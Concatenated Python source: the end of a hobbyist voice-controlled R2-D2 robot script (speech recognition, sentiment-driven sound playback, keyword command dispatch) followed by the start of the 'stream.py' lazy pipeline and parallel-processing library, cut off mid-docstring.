best_guess = (180 - theta[0])
else:
if theta[0] < 0:
best_guess = (theta[1] + 360) % 360
else:
best_guess = (180 - theta[1])
best_guess = (best_guess + 90 + 180) % 360
best_guess = (-best_guess + 120) % 360
return best_guess
def avg_direction(chunks):
acc = 0
i = 0
for chunk in chunks:
direction = get_direction(chunk)
acc += direction
i += 1
return acc/i
"""
listen to user statement in mic
returns spoken words from user OR
returns empty string if source not detected
"""
def listen(r, mic):
with mic as source:
r.adjust_for_ambient_noise(source)
print("\n\n\nYou may begin talking:\n\n\n") #testing
audio = r.listen(source)
byte_data = audio.get_raw_data(16000, 2)
byte_arr = np.fromstring(byte_data, dtype='int16')
chunks = chunkify(byte_arr)
avg_dir = avg_direction(chunks)
print(int(avg_dir))
try:
return r.recognize_google(audio)
except sr.UnknownValueError:
print ("What are you saying?") #testing
return ""
"""
plays respective sound from speakers
based on sentiment analysis value
"""
def react_with_sound (sentiment_value):
print ("about to play sound...")
lead_folder = "/home/pi/r2-tablet_GUI/R2FinalSounds/"
#lead_folder = "/home/yanchen-zhan/Documents/Cornell-Cup/r2-voice_recognition/Final/R2FinalSounds/"
#lead_folder = "C:\PythonProjects\\r2-voice_recognition\Final\R2FinalSounds\\"
sounds = {"confirmation":"R2OK.wav" , "wake up":"R2Awake.wav" , "angry":"R2Angry.wav" , "good":"R2Good.wav" , \
"happy":"R2Happy.wav" , "neutral":"R2Neutral.wav" , "sad":"R2Sad.wav" , \
"sleep":"R2Sleep.wav", "no clue":"R2Confused.wav" , "move":"R2Move.wav" , \
"attendance":"R2Attendance.wav"}
if (sentiment_value == confirmation_final):
play_sound(lead_folder + sounds["confirmation"])
elif (sentiment_value == no_clue_final):
play_sound(lead_folder + sounds["no clue"])
elif (sentiment_value == wakeup_final):
play_sound(lead_folder + sounds["wake up"])
elif (sentiment_value == sleep_final):
play_sound(lead_folder + sounds["sleep"])
elif (sentiment_value == move_final):
play_sound(lead_folder + sounds["move"])
elif (sentiment_value == attendance_final):
play_sound(lead_folder + sounds["attendance"])
elif (sentiment_value < -0.5):
play_sound(lead_folder + sounds["angry"])
elif (sentiment_value < 0):
play_sound(lead_folder + sounds["sad"])
elif (sentiment_value == 0):
play_sound(lead_folder + sounds["neutral"])
elif (sentiment_value > 0.5):
play_sound(lead_folder + sounds["happy"])
else:
play_sound(lead_folder + sounds["good"])
### play sound from speakers
def play_sound(file_name):
wave_obj = sa.WaveObject.from_wave_file(file_name)
play_obj = wave_obj.play()
play_obj.wait_done()
def stop():
print ("emergency invoked")
#start exit procedure here
## begin by creating threads to send poweroff commands to each arduino asynchronously (if feasible)
#t0 = threading.thread(target = shutdown, args = ("",))
#t0.start()
#t0.join()
react_with_sound(sleep_final)
sys.exit()
def wave(methodcnt): # NOTE - INSTANTIATE WITH SPECIAL CASE
global setup_bool
# initial bootup
if (setup_bool == False or methodcnt == False):
setup_bool = True
else:
print ("waving")
react_with_sound(confirmation_final)
return 0
def greet(methodcnt):
global setup_bool
if (setup_bool == False or methodcnt == False):
setup_bool = True
else:
print ("greeting, don't forget to wave")
react_with_sound(confirmation_final)
return 1
# have R2 take attendance
def take_attendance(methodcnt):
global setup_bool
if (setup_bool == False or methodcnt == False):
print ("in if statement")
setup_bool = True
else:
print ("checking in - F.R.")
react_wifth_sound(attendance_final)
client.main()
return 2
def grab_item(item, methodcnt):
global setup_bool
if (setup_bool == False or methodcnt == False):
setup_bool = True
if (item == "periscope"):
open_periscope()
elif (item == "nerf" or "gun" in item):
show_guns()
else:
print ("grabbing " + item)
react_with_sound (confirmation_final)
return 3
def spit_info():
print ("info spit")
react_with_sound (confirmation_final)
return 4
def open_periscope():
print ("opening periscope")
react_with_sound (confirmation_final)
return 5
def show_guns():
print ("showing off dem guns...")
react_with_sound (confirmation_final)
return 6
#implement threading in here
#locks implemented to prevent any conflict in data retrieval
def writeToVoice(input):
lock.acquire()
file=open('VoiceRecognitionText.txt','w+')
file.write(input + "\r\n")
file.close()
lock.release()
def writeToSentiment(score):
lock2.acquire()
score1 = str(score)
file=open('SentimentAnalysisOutput.txt','w+')
file.write(score1 + "\r\n")
file.close()
lock2.release()
def sentiment(input):
try:
response = naturalLanguageUnderstanding.analyze(
text=input,
features=Features(
sentiment=SentimentOptions(document=None, targets=None))).get_result()
parsed_json = json.loads(json.dumps(response, indent=2))
sentiment = parsed_json['sentiment']
document = sentiment['document']
score = document['score']
sentiment_value = float(score)
except:
sentiment_value = sid().polarity_scores(input)['compound']
print(sentiment_value)
react_with_sound(sentiment_value)
return 7
def main():
methodcnt = False
#method dispatcher to connect to functions
dispatcher = {'wave1':wave, 'greet1':greet, 'take_attendance1':take_attendance, 'grab_item1':grab_item}
# https://www.reddit.com/r/Python/comments/7udbs1/using_python_dict_to_call_functions_based_on_user/
#test run to see if all r2 functionality working as expected
fndictGreetingsKeys = {"wave", "hello", "hi", "hey", "check", "attendance"}
fndictGetItemsKeys = {"water", "bottle", "stickers", "periscope"} # NEED TO CHECK SPELLING OF PERISCOPE FOR VOICE RECOGNITION
#in formation of dictionaries, all functions being called
fndictGreetings = {"wave":dispatcher['wave1'], "hello":dispatcher['greet1'], "hi":dispatcher['greet1'], "hey":dispatcher['greet1'], "check":dispatcher['take_attendance1'], "attendance":dispatcher['take_attendance1']}
fndictGetItems = {"water":dispatcher['grab_item1'], "bottle":dispatcher['grab_item1'], "stickers":dispatcher['grab_item1'], "periscope":dispatcher['grab_item1'], "nerf":dispatcher['grab_item1'], "guns":dispatcher['grab_item1'], "gun":dispatcher['grab_item1']}
methodcnt = True
### opens microphone instance that takes speech from human to convert to text
r = sr.Recognizer()
mic = sr.Microphone(2)
# tells R2 to wake up
while (True):
#spoken_text = input("enter text here: ")
spoken_text = listen(r, mic)
spoken_text = spoken_text.lower()
print("The following startup phrase was said:\n" + spoken_text + "\n")
with open("HeyR2File.txt", "a") as myfile:
myfile.write(spoken_text)
# R2 unsure of input
if (spoken_text == ""):
print ("What?")
react_with_sound(no_clue_final)
elif ("r2 stop" in spoken_text):
#write(spoken_text)
stop()
elif ("hey r2" in spoken_text):
print ("awake")
react_with_sound(wakeup_final)
break
# R2 waits to hear what user wants - CHANGE PROMPTS HERE
while (True):
spoken = input("enter text here 2: ")
#spoken = simplify_text(listen (r, mic))
#spoken = spoken.lower()
print("The following text was said:\n" + spoken + "\n")
if ("r2 stop" in spoken):
#write(spoken_text)
stop()
# R2 unsure of input
elif (spoken == ""):
print ("What?")
react_with_sound(no_clue_final)
else:
#use NLTK to determine part of speech of first word spoken
tokens = nltk.word_tokenize (spoken)
tagged = nltk.pos_tag(tokens)
print (tagged[0])
keywords = liteClient.getKeywords(spoken)
#if question desired about Cornell Cup
if ("cup" in keywords and "cornell" in keywords or "competition" in keywords):
spit_info()
#run through commands first
elif ("VB" in tagged[0] or "JJ" in tagged[0]):
if ("high five" in spoken):
keywords.append("high five")
if "wave" in keywords:
wave()
break
else:
for x in range(0, len(keywords)):
word = keywords[x]
print (word)
react_with_sound (confirmation_final)
if (word in fndictGreetingsKeys):
print(fndictGreetings[word](methodcnt))
print ("in fndictGreetingKeys")
break
elif (word in fndictGetItemsKeys):
print(fndictGetItems[word](word, methodcnt))
print ("in fndictGetItemsKey")
break
else:
#sentiment analysis
try:
global sentiment_value
response = naturalLanguageUnderstanding.analyze(
text=spoken,
features=Features(
sentiment=SentimentOptions(document=None, targets=None))).get_result()
parsed_json = json.loads(json.dumps(response, indent=2))
sentiment = parsed_json['sentiment']
document = sentiment['document']
score = document['score']
sentiment_value = float(score)
except:
sentiment_value = sid().polarity_scores(spoken)['compound']
print(sentiment_value)
react_with_sound(sentiment_value)
t1 = threading.Thread(target = writeToVoice, args=(spoken,))
t2 = threading.Thread(target = writeToSentiment, args=(sentiment_value,))
t1.start()
t2.start()
t1.join()
t2.join()
main()
|
stream.py
|
"""Lazily-evaluated, parallelizable pipeline.
Overview
========
Streams are iterables with a pipelining mechanism to enable
data-flow programming and easy parallelization.
The idea is to take the output of a function that turn an iterable into
another iterable and plug that as the input of another such function.
While you can already do this using function composition, this package
provides an elegant notation for it by overloading the '>>' operator.
This approach focuses the programming on processing streams of data, step
by step. A pipeline usually starts with a producer, then passes through
a number of filters. Multiple streams can be branched and combined.
Finally, the output is fed to an accumulator, which can be any function
of one iterable argument.
Producers: anything iterable
+ from this module: seq, gseq, repeatcall, chaincall
Filters:
+ by index: take, drop, takei, dropi
+ by condition: filter, takewhile, dropwhile
+ by transformation: apply, map, fold
+ by combining streams: prepend, tee
+ for special purpose: chop, cut, flatten
Accumulators: item, maximum, minimum, reduce
+ from Python: list, sum, dict, max, min ...
Values are computed only when an accumulator forces some or all evaluation
(not when the stream are set up).
Parallelization
===============
All parts of a pipeline can be parallelized using multiple threads or processes.
When a producer is doing blocking I/O, it is possible to use a ThreadedFeeder
or ForkedFeeder to improve performance. The feeder will start a thread or a
process to run the producer and feed generated items back to the pipeline, thus
minimizing the time that the whole pipeline has to wait when the producer is
blocking in system calls.
If the order of processing does not matter, an ThreadPool or ProcessPool
can be used. They both utilize a number of workers in other theads
or processes to work on items pulled from the input stream. Their output
are simply iterables respresented by the pool objects which can be used in
pipelines. Alternatively, an Executor can perform fine-grained, concurrent job
control over a thread/process pool.
Multiple streams can be piped to a single PCollector or QCollector, which
will gather generated items whenever they are avaiable. PCollectors
can collect from ForkedFeeder's or ProcessPool's (via system pipes) and
QCollector's can collect from ThreadedFeeder's and ThreadPool's (via queues).
PSorter and QSorter are also collectors, but given multiples sorted input
streams (low to high), a Sorter will output items in sorted order.
Using multiples Feeder's and Collector's, one can implement many parallel
processing patterns: fan-in, fan-out, many-to-many map-reduce, etc.
Articles
========
Articles written about this module by the author can be retrieved from
<http://blog.onideas.ws/tag/project:stream.py>.
"""
import builtins
import copy
import collections
import heapq
import itertools
import operator
import queue
import re
import select
import sys
import threading
import time
from operator import itemgetter, attrgetter
try:
import multiprocessing
import multiprocessing.queues
_nCPU = multiprocessing.cpu_count()
except ImportError:
_nCPU = 1
try:
Iterable = collections.Iterable
except AttributeError:
Iterable = object
try:
from operator import methodcaller
except ImportError:
def methodcaller(methodname, *args, **kwargs):
return lambda o: getattr(o, methodname)(*args, **kwargs)
__version__ = '0.8'
#_____________________________________________________________________
# Base class
class BrokenPipe(Exception):
pass
class Stream(Iterable):
"""A stream is both a lazy list and an iterator-processing function.
The lazy list is represented by the attribute 'iterator'.
The iterator-processing function is represented by the method
__call__(iterator), which should return a new iterator
representing the output of the Stream.
By default, __call__(iterator) chains iterator with self.iterator,
appending itself to the input stream in effect.
__pipe__(inpipe) defines the connection mechanism between Stream objects.
By default, it replaces self.iterator with the iterator returned by
__call__(iter(inpipe)).
A Stream subclass will usually implement __call__, unless it is an
accumulator and will not return a Stream, in which case it will need to
implement __pipe__.
The `>>` operator works as follow: the expression `a >> b` means
`b.__pipe__(a) if hasattr(b, '__pipe__') else b(a)`.
>>> [1, 2, 3] >> Stream([4, 5, 6]) >> list
[1, 2, 3, 4, 5, 6]
"""
def __init__(self, iterable=None):
"""Make a Stream object from an iterable."""
self.iterator = iter(iterable if iterable else [])
def __iter__(self):
return self.iterator
def __call__(self, iterator):
"""Append to the end of iterator."""
return itertools.chain(iterator, self.iterator)
def __pipe__(self, inpipe):
self.iterator = self.__call__(iter(inpipe))
return self
@staticmethod
def pipe(inpipe, outpipe):
"""Connect inpipe and outpipe. If outpipe is not a Stream instance,
it should be an function callable on an iterable.
"""
if hasattr(outpipe, '__pipe__'):
return outpipe.__pipe__(inpipe)
elif hasattr(outpipe, '__call__'):
return outpipe(inpipe)
else:
raise BrokenPipe('No connection mechanism defined')
def __rshift__(self, outpipe):
return Stream.pipe(self, outpipe)
def __rrshift__(self, inpipe):
return Stream.pipe(inpipe, self)
def extend(self, outpipe):
"""Similar to __pipe__, except that outpipe must be a Stream, in
which case self.iterator will be modified in-place by calling
outpipe.__call__ on it.
"""
self.iterator = outpipe.__call__(self.iterator)
return self
def __repr__(self):
return 'Stream(%s)' % repr(self.iterator)
#_______________________________________________________________________
# Process streams by element indices
class take(Stream):
"""Take the firts n items of the input stream, return a Stream.
>>> seq(1, 2) >> take(10)
Stream([1, 3, 5, 7, 9, 11, 13, 15, 17, 19])
"""
def __init__(self, n):
"""n: the number of elements to be taken"""
super(take, self).__init__()
self.n = n
self.items = []
def __call__(self, iterator):
self.items = list(itertools.islice(iterator, self.n))
return iter(self.items)
def __repr__(self):
return 'Stream(%s)' % repr(self.items)
negative = lambda x: x and x < 0 ### since None < 0 == True
class itemtaker(Stream):
"""Slice the input stream, return a list.
>>> i = itertools.count()
>>> i >> item[:10:2]
[0, 2, 4, 6, 8]
>>> i >> item[:5]
[10, 11, 12, 13, 14]
>>> xrange(20) >> item[::-2]
[19, 17, 15, 13, 11, 9, 7, 5, 3, 1]
"""
def __init__(self, key=None):
self.key = key
def stop(self):
pass
@staticmethod
def __getitem__(key):
if (type(key) is int) or (type(key) is slice):
return itemtaker(key)
else:
raise TypeError('key must be an integer or a slice')
def __pipe__(self, inpipe):
i = iter(inpipe)
if type(self.key) is int:
## just one item is needed
if self.key >= 0:
# throw away self.key items
collections.deque(itertools.islice(i, self.key), maxlen=0)
return next(i)
else:
# keep the last -self.key items
# since we don't know beforehand when the stream stops
n = -self.key if self.key else 1
items = collections.deque(itertools.islice(i, None), maxlen=n)
if items:
return items[-n]
else:
return []
else:
## a list is needed
if negative(self.key.stop) or negative(self.key.start) \
or not (self.key.start or self.key.stop) \
or (not self.key.start and negative(self.key.step)) \
or (not self.key.stop and not negative(self.key.step)):
# force all evaluation
items = [x for x in i]
else:
# force some evaluation
if negative(self.key.step):
stop = self.key.start
else:
stop = self.key.stop
items = list(itertools.islice(i, stop))
return items[self.key]
def __repr__(self):
return '<itemtaker at %s>' % hex(id(self))
item = itemtaker()
class Sink(Stream):
def __init__(self):
super(Sink, self).__init__()
self._stop = False
def stop(self):
self._stop = True
def __call__(self, iterator):
for x in iterator:
if not self._stop:
pass
else:
return []
def __pipe__(self, inpipe):
i = iter(inpipe)
for x in i:
if not self._stop:
pass
else:
return []
def __repr__(self):
return '<sink at %s>' % hex(id(self))
class takei(Stream):
"""Take elements of the input stream by indices.
>>> seq() >> takei(xrange(2, 43, 4)) >> list
[2, 6, 10, 14, 18, 22, 26, 30, 34, 38, 42]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be taken, should yield
non-negative integers in monotonically increasing order
"""
super(takei, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def itaker():
old_idx = -1
idx = next(self.indexiter) # next value to yield
counter = seq()
while 1:
c = next(counter)
elem = next(iterator)
while idx <= old_idx: # ignore bad values
idx = next(self.indexiter)
if c == idx:
yield elem
old_idx = idx
idx = next(self.indexiter)
return itaker()
class drop(Stream):
"""Drop the first n elements of the input stream.
>>> seq(0, 2) >> drop(1) >> take(5)
Stream([2, 4, 6, 8, 10])
"""
def __init__(self, n):
"""n: the number of elements to be dropped"""
super(drop, self).__init__()
self.n = n
def __call__(self, iterator):
collections.deque(itertools.islice(iterator, self.n), maxlen=0)
return iterator
class dropi(Stream):
"""Drop elements of the input stream by indices.
>>> seq() >> dropi(seq(0,3)) >> item[:10]
[1, 2, 4, 5, 7, 8, 10, 11, 13, 14]
"""
def __init__(self, indices):
"""indices: an iterable of indices to be dropped, should yield
non-negative integers in monotonically increasing order
"""
super(dropi, self).__init__()
self.indexiter = iter(indices)
def __call__(self, iterator):
def idropper():
counter = seq()
def try_next_idx():
## so that the stream keeps going
## after the discard iterator is exhausted
try:
return next(self.indexiter), False
except StopIteration:
return -1, True
old_idx = -1
idx, exhausted = try_next_idx() # next value to discard
while 1:
c = next(counter)
elem = next(iterator)
while not exhausted and idx <= old_idx: # ignore bad values
idx, exhausted = try_next_idx()
if c != idx:
yield elem
elif not exhausted:
old_idx = idx
idx, exhausted = try_next_idx()
return idropper()
#_______________________________________________________________________
# Process streams with functions and higher-order ones
class Processor(Stream):
"""A decorator to turn an iterator-processing function into
a Stream processor object.
"""
def __init__(self, function):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(Processor, self).__init__()
self.function = function
def __call__(self, iterator):
return self.function(iterator)
class apply(Stream):
"""Invoke a function using each element of the input stream unpacked as
its argument list, a la itertools.starmap.
>>> vectoradd = lambda u,v: zip(u, v) >> apply(lambda x,y: x+y) >> list
>>> vectoradd([1, 2, 3], [4, 5, 6])
[5, 7, 9]
"""
def __init__(self, function):
"""function: to be called with each stream element unpacked as its
argument list
"""
super(apply, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.starmap(self.function, iterator)
class smap(Stream):
"""Invoke a function using each element of the input stream as its only
argument, a la itertools.imap.
>>> square = lambda x: x*x
>>> range(10) >> map(square) >> list
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(smap, self).__init__()
self.function = function
def __call__(self, iterator):
return map(self.function, iterator)
class sfilter(Stream):
"""Filter the input stream, selecting only values which evaluates to True
by the given function, a la itertools.ifilter.
>>> even = lambda x: x%2 == 0
>>> range(10) >> filter(even) >> list
[0, 2, 4, 6, 8]
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(sfilter, self).__init__()
self.function = function
def __call__(self, iterator):
return filter(self.function, iterator)
class takewhile(Stream):
"""Take items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.takewhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(takewhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.takewhile(self.function, iterator)
class dropwhile(Stream):
"""Drop items from the input stream that come before the first item to
evaluate to False by the given function, a la itertools.dropwhile.
"""
def __init__(self, function):
"""function: to be called with each stream element as its
only argument
"""
super(dropwhile, self).__init__()
self.function = function
def __call__(self, iterator):
return itertools.dropwhile(self.function, iterator)
class fold(Stream):
"""Combines the elements of the input stream by applying a function of two
argument to a value and each element in turn. At each step, the value is
set to the value returned by the function, thus it is, in effect, an
accumulation.
Intermediate values are yielded (similar to Haskell `scanl`).
This example calculate partial sums of the series 1 + 1/2 + 1/4 +...
>>> gseq(0.5) >> fold(operator.add) >> item[:5]
[1, 1.5, 1.75, 1.875, 1.9375]
"""
def __init__(self, function, initval=None):
super(fold, self).__init__()
self.function = function
self.initval = initval
def __call__(self, iterator):
def folder():
if self.initval:
accumulated = self.initval
else:
accumulated = next(iterator)
while 1:
yield accumulated
val = next(iterator)
accumulated = self.function(accumulated, val)
return folder()
#_____________________________________________________________________
# Special purpose stream processors
class chop(Stream):
"""Chop the input stream into segments of length n.
>>> range(10) >> chop(3) >> list
[[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]]
"""
def __init__(self, n):
"""n: the length of the segments"""
super(chop, self).__init__()
self.n = n
def __call__(self, iterator):
def chopper():
while 1:
s = iterator >> item[:self.n]
if s:
yield s
else:
break
return chopper()
class itemcutter(smap):
"""Slice each element of the input stream.
>>> [range(10), range(10, 20)] >> cut[::2] >> list
[[0, 2, 4, 6, 8], [10, 12, 14, 16, 18]]
"""
def __init__(self, *args):
super(itemcutter, self).__init__( methodcaller('__getitem__', *args) )
@classmethod
def __getitem__(cls, args):
return cls(args)
def __repr__(self):
return '<itemcutter at %s>' % hex(id(self))
cut = itemcutter()
class flattener(Stream):
"""Flatten a nested stream of arbitrary depth.
>>> (xrange(i) for i in seq(step=3)) >> flatten >> item[:18]
[0, 1, 2, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 4, 5, 6, 7, 8]
"""
@staticmethod
def __call__(iterator):
def flatten():
## Maintain a LIFO stack of iterators
stack = []
i = iterator
while True:
try:
e = next(i)
if hasattr(e, "__iter__") and not isinstance(e, basestring):
stack.append(i)
i = iter(e)
else:
yield e
except StopIteration:
try:
i = stack.pop()
except IndexError:
break
return flatten()
def __repr__(self):
return '<flattener at %s>' % hex(id(self))
flatten = flattener()
#_______________________________________________________________________
# Combine multiple streams
class prepend(Stream):
"""Inject values at the beginning of the input stream.
>>> seq(7, 7) >> prepend(xrange(0, 10, 2)) >> item[:10]
[0, 2, 4, 6, 8, 7, 14, 21, 28, 35]
"""
def __call__(self, iterator):
return itertools.chain(self.iterator, iterator)
class tee(Stream):
"""Make a T-split of the input stream.
>>> foo = filter(lambda x: x%3==0)
>>> bar = seq(0, 2) >> tee(foo)
>>> bar >> item[:5]
[0, 2, 4, 6, 8]
>>> foo >> item[:5]
[0, 6, 12, 18, 24]
"""
def __init__(self, named_stream):
"""named_stream: a Stream object toward which the split branch
will be piped.
"""
super(tee, self).__init__()
self.named_stream = named_stream
def __pipe__(self, inpipe):
branch1, branch2 = itertools.tee(iter(inpipe))
self.iterator = branch1
Stream.pipe(branch2, self.named_stream)
return self
#_____________________________________________________________________
# _iterqueue and _iterrecv
def _iterqueue(queue):
# Turn a either a threading.Queue or a multiprocessing.queues.SimpleQueue
# into an thread-safe iterator which will exhaust when StopIteration is
# put into it.
while 1:
item = queue.get()
if item is StopIteration:
# Re-broadcast, in case there is another listener blocking on
# queue.get(). That listener will receive StopIteration and
# re-broadcast to the next one in line.
try:
queue.put(StopIteration)
except IOError:
# Could happen if the Queue is based on a system pipe,
# and the other end was closed.
pass
break
else:
yield item
def _iterrecv(pipe):
# Turn a the receiving end of a multiprocessing.Connection object
# into an iterator which will exhaust when StopIteration is
# put into it. _iterrecv is NOT safe to use by multiple threads.
while 1:
try:
item = pipe.recv()
except EOFError:
break
else:
if item is StopIteration:
break
else:
yield item
#_____________________________________________________________________
# Threaded/forked feeder
class ThreadedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a separate thread. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other threads.
This should improve performance when the generator often
blocks in system calls.
"""
self.outqueue = queue.Queue()
def feeder():
i = generator(*args, **kwargs)
while 1:
try:
self.outqueue.put(next(i))
except StopIteration:
self.outqueue.put(StopIteration)
break
self.thread = threading.Thread(target=feeder)
self.thread.deamon = True
self.thread.start()
def __iter__(self):
return _iterqueue(self.outqueue)
def join(self):
self.thread.join()
def __repr__(self):
return '<ThreadedFeeder at %s>' % hex(id(self))
class ForkedFeeder(Iterable):
def __init__(self, generator, *args, **kwargs):
"""Create a feeder that start the given generator with
*args and **kwargs in a child process. The feeder will
act as an eagerly evaluating proxy of the generator.
The feeder can then be iter()'ed over by other processes.
This should improve performance when the generator often
blocks in system calls. Note that serialization could
be costly.
"""
self.outpipe, inpipe = multiprocessing.Pipe(duplex=False)
def feed():
i = generator(*args, **kwargs)
while 1:
try:
inpipe.send(next(i))
except StopIteration:
inpipe.send(StopIteration)
break
self.process = multiprocessing.Process(target=feed)
self.process.start()
def __iter__(self):
return _iterrecv(self.outpipe)
def join(self):
self.process.join()
def __repr__(self):
return '<ForkedFeeder at %s>' % hex(id(self))
#_____________________________________________________________________
# Asynchronous stream processing using a pool of threads or processes
class ThreadPool(Stream):
"""Work on the input stream asynchronously using a pool of threads.
>>> range(10) >> ThreadPool(map(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
`failure` is a thead-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(ThreadPool, self).__init__()
self.function = function
self.inqueue = queue.Queue()
self.outqueue = queue.Queue()
self.failqueue = queue.Queue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception as e:
self.failqueue.put((next(dupinput), e))
self.worker_threads = []
for _ in range(poolsize):
t = threading.Thread(target=work)
self.worker_threads.append(t)
t.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for t in self.worker_threads:
t.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
raise BrokenPipe('All workers are dead, refusing to summit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ThreadPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class ProcessPool(Stream):
"""Work on the input stream asynchronously using a pool of processes.
>>> range(10) >> ProcessPool(map(lambda x: x*x)) >> sum
285
The pool object is an iterable over the output values. If an
input value causes an Exception to be raised, the tuple (value,
exception) is put into the pool's `failqueue`. The attribute
`failure` is a thead-safe iterator over the `failqueue`.
See also: Executor
"""
def __init__(self, function, poolsize=_nCPU, args=[], kwargs={}):
"""function: an iterator-processing function, one that takes an
iterator and return an iterator
"""
super(ProcessPool, self).__init__()
self.function = function
self.poolsize = poolsize
self.inqueue = multiprocessing.queues.SimpleQueue()
self.outqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
def work():
input, dupinput = itertools.tee(_iterqueue(self.inqueue))
output = self.function(input, *args, **kwargs)
while 1:
try:
self.outqueue.put(next(output))
next(dupinput)
except StopIteration:
break
except Exception as e:
self.failqueue.put((next(dupinput), e))
self.worker_processes = []
for _ in range(self.poolsize):
p = multiprocessing.Process(target=work)
self.worker_processes.append(p)
p.start()
def cleanup():
# Wait for all workers to finish,
# then signal the end of outqueue and failqueue.
for p in self.worker_processes:
p.join()
self.outqueue.put(StopIteration)
self.failqueue.put(StopIteration)
self.closed = True
self.cleaner_thread = threading.Thread(target=cleanup)
self.cleaner_thread.start()
self.iterator = _iterqueue(self.outqueue)
def __call__(self, inpipe):
if self.closed:
raise BrokenPipe('All workers are dead, refusing to summit jobs. '
'Use another Pool.')
def feed():
for item in inpipe:
self.inqueue.put(item)
self.inqueue.put(StopIteration)
self.feeder_thread = threading.Thread(target=feed)
self.feeder_thread.start()
return self.iterator
def join(self):
self.cleaner_thread.join()
def __repr__(self):
return '<ProcessPool(poolsize=%s) at %s>' % (self.poolsize, hex(id(self)))
class Executor(object):
"""Provide a fine-grained level of control over a ThreadPool or ProcessPool.
The constructor takes a pool class and arguments to its constructor::
>>> executor = Executor(ThreadPool, map(lambda x: x*x))
Job ids are returned when items are submitted::
>>> executor.submit(*range(10))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> executor.submit('foo')
10
A call to close() ends jobs submission. Workers threads/processes
are now allowed to terminate after all jobs are completed::
>>> executor.close()
The `result` and `failure` attributes are Stream instances and
thus iterable. The returned iterators behave as follow: their
next() calls will block until a next output is available, or
raise StopIteration if there is no more output. Thus we could use
the attributes `result` and `failure` like any other iterables::
>>> set(executor.result) == set([0, 1, 4, 9, 16, 25, 36, 49, 64, 81])
True
>>> list(executor.failure)
[('foo', TypeError("can't multiply sequence by non-int of type 'str'",))]
"""
def __init__(self, poolclass, function, poolsize=_nCPU, args=[], kwargs={}):
def process_job_id(input):
input, dupinput = itertools.tee(input)
id = iter(dupinput >> cut[0])
input = iter(input >> cut[1])
output = function(input, *args, **kwargs)
for item in output:
yield next(id), item
self.pool = poolclass(process_job_id,
poolsize=poolsize,
args=args,
kwargs=kwargs)
self.jobcount = 0
self._status = []
self.waitqueue = queue.Queue()
if poolclass is ProcessPool:
self.resultqueue = multiprocessing.queues.SimpleQueue()
self.failqueue = multiprocessing.queues.SimpleQueue()
else:
self.resultqueue = queue.Queue()
self.failqueue = queue.Queue()
self.result = Stream(_iterqueue(self.resultqueue))
self.failure = Stream(_iterqueue(self.failqueue))
self.closed = False
self.lock = threading.Lock()
## Acquired to submit and update job statuses.
self.sema = threading.BoundedSemaphore(poolsize)
## Used to throttle transfer from waitqueue to pool.inqueue,
## acquired by input_feeder, released by trackers.
def feed_input():
for id, item in _iterqueue(self.waitqueue):
self.sema.acquire()
with self.lock:
if self._status[id] == 'SUBMITTED':
self.pool.inqueue.put((id, item))
self._status[id] = 'RUNNING'
else:
self.sema.release()
self.pool.inqueue.put(StopIteration)
self.inputfeeder_thread = threading.Thread(target=feed_input)
self.inputfeeder_thread.start()
def track_result():
for id, item in self.pool:
self.sema.release()
with self.lock:
self._status[id] = 'COMPLETED'
self.resultqueue.put(item)
self.resultqueue.put(StopIteration)
self.resulttracker_thread = threading.Thread(target=track_result)
self.resulttracker_thread.start()
def track_failure():
for outval, exception in self.pool.failure:
self.sema.release()
id, item = outval
with self.lock:
self._status[id] = 'FAILED'
self.failqueue.put((item, exception))
self.failqueue.put(StopIteration)
self.failuretracker_thread = threading.Thread(target=track_failure)
self.failuretracker_thread.start()
def submit(self, *items):
"""Return job ids assigned to the submitted items."""
with self.lock:
if self.closed:
raise BrokenPipe('Job submission has been closed.')
id = self.jobcount
self._status += ['SUBMITTED'] * len(items)
self.jobcount += len(items)
for item in items:
self.waitqueue.put((id, item))
id += 1
if len(items) == 1:
return id - 1
else:
return range(id - len(items), id)
def cancel(self, *ids):
"""Try to cancel jobs with associated ids.
Return the actual number of jobs cancelled.
"""
ncancelled = 0
with self.lock:
for id in ids:
try:
if self._status[id] == 'SUBMITTED':
self._status[id] = 'CANCELLED'
ncancelled += 1
except IndexError:
pass
return ncancelled
def status(self, *ids):
"""Return the statuses of jobs with associated ids at the
time of call: either 'SUBMITED', 'CANCELLED', 'RUNNING',
